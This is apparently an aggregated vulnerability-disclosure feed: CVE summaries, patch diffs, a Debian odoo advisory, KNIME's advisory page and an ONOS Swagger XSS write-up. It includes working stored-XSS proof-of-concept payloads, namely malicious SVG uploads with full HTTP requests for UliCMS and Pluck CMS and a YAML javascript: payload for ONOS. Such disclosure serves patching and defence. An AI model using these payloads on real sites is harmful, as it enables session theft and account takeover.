Cross-site Scripting (XSS) - Stored in GitHub repository unilogies/bumsys prior to 2.2.0.

CVE-2023-2553

Cross-site Scripting (XSS) - Reflected in GitHub repository thorsten/phpmyfaq prior to 3.1.13.

Expand Up @@ -31,12 +31,12 @@ class Tags /\*\* \* @var Configuration \*/ private $config; private Configuration $config;  
/\*\* \* @var array<int, string> \*/ private $recordsByTagName = \[\]; private array $recordsByTagName = \[\];  
/\*\* \* Constructor. Expand All @@ -59,11 +59,11 @@ public function getAllLinkTagsById(int $recordId): string $tagListing = '';  
foreach ($this\->getAllTagsById($recordId) as $taggingId => $taggingName) { $title = Strings::htmlspecialchars($taggingName, ENT\_QUOTES, 'utf-8'); $title = Strings::htmlentities($taggingName); $url = sprintf('%sindex.php?action=search&amp;tagging\_id=%d', $this\->config\->getDefaultUrl(), $taggingId); $oLink = new Link($url, $this\->config); $oLink\->itemTitle = $taggingName; $oLink\->text = $taggingName; $oLink\->itemTitle = $title; $oLink\->text = $title; $oLink\->tooltip = $title; $tagListing .= $oLink\->toHtmlAnchor() . ', '; } Expand Down

CVE-2023-2427: fix: added missing conversion to HTML entities · thorsten/phpMyFAQ@514f4df

Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.7.

Expand Up @@ -2795,30 +2795,30 @@ function(teampassApplication) { var data \= { 'anyone\_can\_modify': $('#form-item-anyoneCanModify').is(':checked') ? 1 : 0, 'complexity\_level': parseInt($('#form-item-password-complex').val()), 'description': $('#form-item-description').summernote('code') !== "<p><br></p>" ? $('#form-item-description').summernote('code') : '', 'description': $('#form-item-description').summernote('code') !== "<p><br></p>" ? DOMPurify.sanitize($('#form-item-description').summernote('code'), {USE\_PROFILES: {html: true}}) : '', 'diffusion\_list': diffusion, 'diffusion\_list\_names': diffusionNames, 'folder': parseInt($('#form-item-folder').val()), 'email': $('#form-item-email').val(), 'email': DOMPurify.sanitize($('#form-item-email').val()), 'fields': fields, 'folder\_is\_personal': store.get('teampassItem').IsPersonalFolder \=== 1 ? 1 : 0, 'id': store.get('teampassItem').id, 'label': $('#form-item-label').val(), 'login': $('#form-item-login').val(), 'label': DOMPurify.sanitize($('#form-item-label').val()), 'login': DOMPurify.sanitize($('#form-item-login').val()), 'pw': $('#form-item-password').val(), 'restricted\_to': restriction, 'restricted\_to\_roles': restrictionRole, 'tags': $('#form-item-tags').val(), 'tags': DOMPurify.sanitize($('#form-item-tags').val()), 'template\_id': parseInt($('input.form-check-input-template:checkbox:checked').data('category-id')), 'to\_be\_deleted\_after\_date': ($('#form-item-deleteAfterDate').length !== 0 && $('#form-item-deleteAfterDate').val() !== '') ? $('#form-item-deleteAfterDate').val() : '', 'to\_be\_deleted\_after\_x\_views': ($('#form-item-deleteAfterShown').length !== 0 && $('#form-item-deleteAfterShown').val() !== '' && $('#form-item-deleteAfterShown').val() \>= 1) ? parseInt($('#form-item-deleteAfterShown').val()) : '', 'url': $('#form-item-url').val(), 'url': DOMPurify.sanitize($('#form-item-url').val()), 'user\_id': parseInt('<?php echo $\_SESSION\['user\_id'\]; ?>'), 'uploaded\_file\_id': store.get('teampassApplication').uploadedFileId \=== undefined ? '' : store.get('teampassApplication').uploadedFileId, 'fa\_icon': $('#form-item-icon').val(), 'fa\_icon': DOMPurify.sanitize($('#form-item-icon').val()), }; if (debugJavascript \=== true) { console.log('SAVING DATA'); Expand Down

CVE-2023-2516: 3.0.7 · nilsteampassnet/TeamPass@39b774c

IBM Maximo Asset Management 7.6.1.2 and 7.6.1.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  IBM X-Force ID:  239436.

CVE-2022-43866

Debian Linux Security Advisory 5399-1 - Several vulnerabilities were discovered in odoo, a suite of web based open source business apps.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5399-1                   security@debian.org  
https://www.debian.org/security/                       Sebastien Delafond  
May 05, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : odoo  
CVE ID         : CVE-2021-23166 CVE-2021-23176 CVE-2021-23178 CVE-2021-23186   
                 CVE-2021-23203 CVE-2021-26263 CVE-2021-26947 CVE-2021-44476   
                 CVE-2021-44775 CVE-2021-45071 CVE-2021-45111

Several vulnerabilities were discovered in odoo, a suite of web based  
open source business apps.

CVE-2021-44775, CVE-2021-26947, CVE-2021-45071, CVE-2021-26263:

  XSS allowing remote attacker to inject arbitrary commands.

CVE-2021-45111:

  Incorrect access control allowing authenticated remote user to  
  create user accounts and access restricted data.

CVE-2021-44476, CVE-2021-23166:

  Incorrect access control allowing authenticated remote administrator  
  to access local files on the server.

CVE-2021-23186:

  Incorrect access control allowing authenticated remote administrator  
  to modify database contents of other tenants.

CVE-2021-23178:

  Incorrect access control allowing authenticated remote user to  
  use another user's payment method.

CVE-2021-23176:

  Incorrect access control allowing authenticated remote user to  
  access accounting information.

CVE-2021-23203:

  Incorrect access control allowing authenticated remote user to  
  access arbitrary documents via PDF exports.

For the stable distribution (bullseye), these problems have been fixed in  
version 14.0.0+dfsg.2-7+deb11u1.

We recommend that you upgrade your odoo packages.

For the detailed security status of odoo please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/odoo

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmRU7kEACgkQEL6Jg/PV  
nWTQrAf+K6CpxmFeKM/7G70xafsw+lLu4UlaoLYUh55rgsFd9/YHUuwCHiCmoP1P  
4GnVJkNu6qj8rW1EReUtKZ76XQTLsD9ZxgM6tFBGA9EDi0hPjR4KEI7jtdXjx9ro  
8LOyu51xeqoraKTmkPw+EnUCWCjutH78l8y9ywqHORQI0WM9Q2Zh0fHJz1c+2uzd  
HqFvo1brOgu7zkI3luH8IjEHpCHpUVbe8rTnY0g2PSrZott/k0fIZ8qNSzyfG7ah  
R5auoI5y+z5TusByKWnQ48jQCbU8WeqXaQUqT/pGtjGz9ljClTwDkmqqv/6BNnyF  
Et5uV+Yn6UWsxXUcz6u9CwOzkrpVxA==  
=KDFV  
-----END PGP SIGNATURE-----

Debian Security Advisory 5399-1

UliCMS version 2023-1 Sniffing-Vicuna suffers from a persistent cross site scripting vulnerability.

    #Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)#Application: Ulicms#Version: 2023.1-sniffing-vicuna#Bugs:  Stored Xss#Technology: PHP#Vendor URL: https://en.ulicms.de/#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip#Date of found: 04-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux 2. Technical Details & POC========================================steps: 1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /dist/admin/fm/upload.php HTTP/1.1Host: localhostContent-Length: 663sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABClX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36sec-ch-ua-platform: "Linux"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/dist/admin/fm/dialog.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delvConnection: close------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="fldr"------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryK3CvcSs8xZwzABCl--3. Go to http://localhost/dist/content/SVG_XSS.svg

UliCMS 2023-1 Sniffing-Vicuna Cross Site Scripting

Pluck CMS version 4.7.18 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)Application: pluckVersion: 4.7.18Bugs:  XSSTechnology: PHPVendor URL: https://github.com/pluck-cms/pluckSoftware Link: https://github.com/pluck-cms/pluckDate of found: 01-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. create .svg file.2. svg file content:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)poc requestPOST /pluck-4.7.18/admin.php?action=files HTTP/1.1Host: localhostContent-Length: 672Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/pluck-4.7.18/admin.php?action=filesAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8deConnection: close------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="submit"Upload------WebKitFormBoundaryJMTiFxESCx7aNqmI--4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg

Pluck CMS 4.7.18 Cross Site Scripting

Sensitive information exposure in the Web Frontend of KNIME Business Hub until 1.X allows an unauthenticated attacker to extract information about the system. By making a request to a non-existent URL the system will  sensitive information to the caller such as internal IP addresses, hostnames, Istio
metadata, internal file paths and more.

The problem is fixed in KNIME Business Hub 1.xxx. There is no workaround for previous versions.




This page summarizes all security advisories for KNIME Software products and services, including KNIME Analytics Platform, KNIME Server, and KNIME Hub.

Please note that the CVSS Score is an indication of the potential _severity_ of the issue but not the _risk_. The actual risk needs to be assessed by every user individually because there may be circumstances where a high severity issue is not applicable and therefore does not pose a risk (and vice-versa).

If you want to know more about the CVSS Score, have a look at the resources provided by the Common Vulnerability Scoring System SIG.

**CVE-2022-44749 - Opening workflows in KNIME Analytics Platform from untrusted sources may override arbitrary file system contents**

*   Published: 2022-11-24
*   Affected Products: KNIME Analytics Platform since 3.2.0
*   Fixed Products: KNIME Analytics Platform 4.6.4
*   Base CVSS Score: 5.5
*   CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N/E:F/RL:O/RC:C/CR:X/IR:L/AR:X/MAV:L/MAC:L/MPR:N/MUI:R/MS:U/MC:N/MI:H/MA:N

A directory traversal vulnerability in the ZIP archive extraction routines of any version of KNIME Analytics Platform can result in arbitrary files being overwritten on the user's system. This vulnerability is also known as 'Zip-Slip'.

An attacker can create a KNIME workflow that, when being opened by a user, can overwrite arbitrary files that the user has write access to. It's not necessary to execute the workflow, opening the workflow is sufficient. The user will notice that something is wrong because an error is being reported but only after the files have already been written.

This can impact data integrity (file contents are changed) or cause errors in other software (vital files being corrupted). It can even lead to remote code execution if executable files are being replaced and subsequently executed by the user.

As a workaround do not open workflows from untrusted sources. Updates to fixed versions 4.6.4 (or 4.4.5 and 4.5.3 once they become available) are advised.

This vulnerability was found internally.

**CVE-2022-44748 - Uploading workflows to KNIME Server may override arbitrary file system contents**

*   Published: 2022-11-24
*   Affected Products: KNIME Server since 4.3.0
*   Fixed Products: KNIME Server 4.13.6, 4.14.3, 4.15.3
*   Base CVSS Score: 7.1
*   CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L/E:F/RL:O/RC:C/CR:X/IR:L/AR:L/MAV:N/MAC:L/MPR:L/MUI:N/MS:U/MC:N/MI:H/MA:L

A directory traversal vulnerability in the ZIP archive extraction routines of KNIME Server 4.3.0 and above can result in arbitrary files being overwritten on the server's file system. This vulnerability is also known as 'Zip-Slip'.

An attacker can create a KNIME workflow that, when being uploaded, can overwrite arbitrary files that the operating system user running the KNIME Server process has write access to. The user must be authenticated and have permissions to upload files to KNIME Server.

This can impact data integrity (file contents are changed) or cause errors in other software (vital files being corrupted). It can even lead to remote code execution if executable files are being replaced and subsequently executed by the KNIME Server process user. In all cases the attacker has to know the location of files on the server's file system, though.

Note that users that have permissions to upload workflows usually also have permissions to run them on the KNIME Server and can therefore already execute arbitrary code in the context of the KNIME Executor's operating system user. Therefore we score the risk of this vulnerability as low.

There is no workaround to prevent this vulnerability from being exploited. Updates to fixed versions 4.13.6, 4.14.3, or 4.15.3 are advised

This vulnerability was found internally.

**External CVE-2022-42889 - Vulnerability in Apache Commons Text**

*   Published: 2022-10-25 and updated 2022-10-28
*   Affected Product: _none_

A vulnerability in the _StringLookup_ class of Apache Commons Text (versions below 1.10) has recently been disclosed. It allows remote code execution under certain circumstances and was therefore given a CVSS Score of 9.8. Both KNIME Analytics Platform and KNIME Server make use of Apache Commons Text but **not** of the affected class. This means our own code is not vulnerable and therefore there is no risk for KNIME users. Also Apache Spark, which is part of the _KNIME Extension for Local Big Data Environments_ and uses Apache Commons Text as well, is not affected by the vulnerability.

**CVE-2022-31500 - Windows installer for KNIME Analytics Platform allows for privilege escalation**

*   Published: 2022-05-24
*   Affected Product: KNIME Analytics Platform before 4.6.0
*   Base CVSS Score: 8.2
*   Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H/E:F/RL:T/RC:X/CR:L/IR:L/AR:L/MAV:L/MAC:L/MPR:N/MUI:R/MS:C/MC:H/MI:H/MA:H

The installer for KNIME Analytics Platform on Windows before 4.6.0 makes the installation directory writeable to everyone on the system. This is useful so that the user can update or install extensions from a running KNIME Analytics Platform without having to restart the application as administrator. However, this also allows other authenticated local users on the system to (re)place malicious files in the installation e.g. replacing the uninstall program. The latter is run with administration privileges if the application is being uninstalled (by a user with administrative privileges). Starting with KNIME Analytics Platform 4.6.0 the installer will restrict write access to the installation directory to admin users. This also means that in order to update or install additional extensions, KNIME Analytics Platform must first be started with admin privileges.

Note that the KNIME Server installer for Windows, which can create a KNIME Analytics Platform installation used as an executor, is **not** affected.

**Workaround**

Existing installations can be "fixed" by restricting the permissions of the installation folder manually. If you use the self-extracting archive or the ZIP file the default permissions on Windows apply, which usually means that only the extracting user has write permissions on the installation directory. In this case update or installation of extensions is possible without starting KNIME Analytics Platform as admin user.

The vulnerability was found and reported by Łukasz Rupala & Przemysław Mazurek.

**CVE-2021-45096 - External XML Entity Injection with specially crafted workflow files**

*   Published: 2021-12-16
*   Affected Product: KNIME Analytics Platform before 4.5.0
*   Base CVSS Score: 4.3
*   Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

KNIME Analytics Platform before 4.5.0 with resolve external entities in workflow.knime files when loading a workflow. Using a specially crafted workflow file, potentially sensitive information such as Windows network password hashes maybe leaked _to_ a remote system. It can not be used to leak information _from_ a remote system e.g. when a workflow is loaded on KNIME Server.

The vulnerability was found and reported by Dawid Czarnecki from NATO.

****CVE-2021-45097 -** Server installer does not restrict permission on auto-install.xml**

*   Published: 2021-12-16
*   Affected Product: KNIME Server before 4.12.6 and 4.13.x before 4.13.4
*   Base CVSS Score: 2.9
*   Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

KNIME Server before 4.12.6 and 4.13.x before 4.13.4 (when installed in unattended mode) keeps the administrator's password in a file without appropriate file access controls, allowing all local users to read its content.

The vulnerability was found and reported by Dawid Czarnecki from NATO.

**CVE-2021-44725 - Directory path traversal when requesting client profiles**

*   Published: 2021-12-07
*   Affected Product: KNIME Server between 4.7.0 and below 4.11.6, 4.12.5, 4.13.4, respectively
*   Base CVSS Score: 7.5
*   Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

The server managed customizations functionality of KNIME Server starting at version 4.7.0 is vulnerable to Directory Path Traversal attacks. By manipulating variables that reference files by prepending “dot-dot-slash (../)” sequences and their variations or by using absolute file paths, it is possible to access arbitrary files and directories stored on the file system including application source code, configuration, and database. Due to the file-based architecture of KNIME Server, this vulnerability allows stealing users' data  
such as password hashes, workflows, licenses, jobs, and so on. No authentication is required to exploit this vulnerability.

The issue is fixed in KNIME Server 4.13.4, 4.12.5, and 4.11.6 which have been released today. All customers are advised to update their server's immediately.

**Workaround**

If you cannot update right away you can apply the following workaround which prevents access to client profiles for any user:

1.  Locate _<apache-tomcat>/webapps/knime/WEB-INF/web.xml_
2.  Edit the file and add the following block before the existing line <deny-uncovered-http-methods /> at the bottom of the file:
    
       ...
       <security-constraint>
          <web-resource-collection>
             <web-resource-name>Profiles
             <url-pattern>/rest/v4/profiles/contents
          </web-resource-collection>
          <auth-constraint />
       </security-constraint>
    
       <deny-uncovered-http-methods />
    </web-app>
    
3.  Restart KNIME Server.

The vulnerability was found and reported by Dawid Czarnecki from NATO.

**CVE-2021-44726 - Cross-Site-Scripting vulnerability in old WebPortal login**

*   Published: 2021-12-07
*   Affected Product: KNIME Server below 4.13.4
*   Base CVSS Score: 8.8
*   Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L

The old KNIME WebPortal login page up to version 4.13.3 contains a DOM-based XSS vulnerability that once exploited, can be used to run any action as a victim user via malicious JavaScript. If the victim user is an administrator, it could be used to create a new administrator. To exploit the vulnerability it is required to create a specially crafted URL and convince the victim to open it. No authentication is required to exploit the vulnerability, however, authenticated users can be targeted.

The vulnerability was found and reported by Dawid Czarnecki from NATO

CVE-2023-2535: Security Advisories | KNIME

A vulnerability was found in External Media without Import Plugin up to 1.0.0 on WordPress. It has been declared as problematic. This vulnerability affects the function print_media_new_panel of the file external-media-without-import.php. The manipulation of the argument url/error/width/height/mime-type leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.0.1 is able to address this issue. The name of the patch is 9d2ecd159a6e2e3f710b4f1c28e2714f66502746. It is recommended to upgrade the affected component. VDB-227950 is the identifier assigned to this vulnerability.

CVE-2017-20183

An arbitrary file upload vulnerability in Open Networking Foundation ONOS from version 1.9.0 until 2.7.0 allows attackers to execute arbitrary code via uploading a crafted YAML file.

****CVE-2023-30093****

Author: Edoardo Ottavianelli  
03/05/2023

In this post I will go through CVE-2023-30093: the description, replication of the vulnerability and POC.

ONOS (Open Network Operating System), a product of Open Networking Foundation, is "the leading open source SDN controller for building next-generation SDN/NFV solutions. ONOS was designed to meet the needs of operators wishing to build carrier-grade solutions that leverage the economics of white box merchant silicon hardware while offering the flexibility to create and deploy new dynamic network services with simplified programmatic interfaces. ONOS supports both configuration and real-time control of the network, eliminating the need to run routing and switching control protocols inside the network fabric. By moving intelligence into the ONOS cloud controller, innovation is enabled and end-users can easily create new network applications without the need to alter the dataplane systems."

Among ONOS users we can see Comcast, Deutsche Telekom, AT&T and other big companies.

The ONOS platform includes:

*   A platform and a set of applications that act as an extensible, modular, distributed SDN controller.
*   Simplified management, configuration and deployment of new software, hardware & services.
*   A scale-out architecture to provide the resiliency and scalability required to meet the rigors of production carrier environments.

**Description of the vulnerability**

Since version v1.9.0 (https://github.com/opennetworkinglab/onos/releases/tag/1.9.0) until 2.7.0 (https://github.com/opennetworkinglab/onos/releases/tag/2.7.0) included, ONOS uses Swagger as dependency. In particular ("Swagger UI allows anyone — be it your development team or your end consumers — to visualize and interact with the API's resources without having any of the implementation logic in place. It's automatically generated from your OpenAPI (formerly known as Swagger) Specification, with the visual documentation making it easy for back end implementation and client side consumption."), a vulnerable Swagger UI version (v2.2.10). We can use an external file to specify how the API are built using the \`url\` parameter, but since the authorizationUrl (securityDefinitions > OAuth2 > authorizationUrl) is not properly sanitized, this will result in a cross site scripting injection.

Payload:

swagger: "2.0"
info:
    title: edoardottt XSS
    description: XSS ONOS POC
    version: 1.0.0
host: edoardoottavianelli.it
basePath: /v1
schemes:
    - https

securityDefinitions:
    OAuth2:
        type: oauth2
        flow: accessCode
        authorizationUrl: javascript:alert(document.cookie)//
        tokenUrl: https://example.com/oauth/token
        scopes:
            read: Grants read access
            write: Grants write access
            admin: Grants read and write access to administrative information
                            

**Replication of the vulnerability**

*   Start ONOS locally (**bazel run onos-local**)
*   Visit http://localhost:8181/onos/v1/docs/?url=URL-PAYLOAD-FILE
*   URL-PAYLOAD-FILE is the URL pointing to the YAML file containing the payload (could be a GitHub gist)
*   The victim will see a page like this:

If the victim clicks on the Authorize button on the right upper corner, then check at least one of read, write, admin and click the Authorize button in the central window the javascript payload will be executed.

**POC**

See the Youtube Video POC here:

**References**

*   https://nvd.nist.gov/vuln/detail/CVE-2023-30093
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30093
*   https://www.youtube.com/embed/jZr2JhDd\_S8
*   https://github.com/edoardottt/offensive-onos/

Tag

#xss